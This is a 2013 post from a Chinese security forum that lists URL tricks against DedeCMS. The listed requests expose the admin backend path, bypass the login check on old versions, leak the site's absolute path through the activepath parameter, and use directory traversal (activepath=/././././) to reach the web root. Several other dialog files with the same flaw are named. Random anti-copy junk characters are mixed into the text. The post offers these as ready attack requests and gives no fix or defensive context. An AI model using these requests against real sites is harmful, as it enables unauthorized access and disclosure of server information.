找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2104|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理! P' `3 R' f: n& j- E
0 [# j+ x( {! A( H, U, W- z' a
员帐号,新版本的就直接转向了后台.
8 w$ \! k5 k$ R6 M, `
& }  ~  g) n3 }1 i8 h3 c2.include/dialog/config.php会爆出后台管理路径
' P  \# a2 c% o* `8 I  u% [4 D- [# p0 Q: P
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录8 A! ~3 a! B. R
! r6 F2 k0 i, D
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
3 C( N( u$ c# d8 d9 J) ]/ v. s4 v) u# J, p' H
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉! h& g( y$ ]# E
! u+ J. s2 V7 t) P: q% z
到根目录去.不过这些版本的访问地址有些不同.' b& V, s7 Z9 u/ @
地址为require/dialog/select_soft.php?activepath=/././././././././
/ `' c* c2 u* i4 v9 |5 m
- ~/ p9 G! G; [" O6 ]include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
5 Z" C$ Y8 \4 n. {( z4 C存在相同问题的文件还有6 W3 Y7 A) I7 n5 j4 V: X  L5 \
include\dialog\select_images.php, b8 [; G( H: s- q0 a2 [: w
include\dialog\select_media.php
/ t/ k( g3 R4 qinclude\dialog\select_templets.php​1 H( P  Q5 t( n  y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表